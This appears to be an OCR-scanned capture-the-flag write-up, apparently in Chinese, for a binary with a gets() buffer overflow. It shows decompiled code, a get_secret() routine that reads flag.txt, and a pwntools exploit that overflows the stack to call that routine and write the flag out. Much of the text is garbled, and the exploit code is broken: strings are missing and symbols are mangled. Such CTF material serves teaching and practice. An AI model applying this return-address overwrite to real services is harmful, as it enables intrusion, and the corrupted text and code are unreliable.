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int _ cdecl main(int argc, const char **argv, const char **envp)

{
char v4; // [esp+Fh] [ebp-2Dh]

printf("bor4 v3ir s3 7u 4h o bichdo m3m@... ");
gets(&vl);
return 8;

h

o gets(&va4); : (F1EMH
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1E main() BAEL L H R — get_secret() BAEL:

vl = fopen("flag.txt", &unk 8BCF91B);
fgets(&F14g, 45, vo);
return fclose(vd);

¥
.bss:@8AECA2C db ?
.bss:@80ECAZD public flag
-bss:080ECA2D flag db  ?; ; DATA XREF: get_secret+26%o
.bss:B8OECAZE db ?
.bss:@80ECA2F db ?
heoco - ARAET A 2GR Ah ?

° fgets(&flag, 45, v0); : FF1RIMIflag i/t | bssk [ Hili A e8eEcA2D
BH Bk

o FRRHUFERMET L, FIELL AN R IR Al IR 5 K get_secret() HUMLAL.

o flag & BlbssEH 1, Al write BEUK bss B H HIflags 3T BN H K.
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nm

5E 8 exp

from pwn import

r remote( ,27604)

elf = ELF(

flag_func_addr = elf.symbols[
flag _addr=0x80ECA2D

payload 45 p32(flag_func_addr) p32(elf.sym[ EPIGD) p32(flag_addr) p32(100)
r.sendline(payload)

r.interactive()
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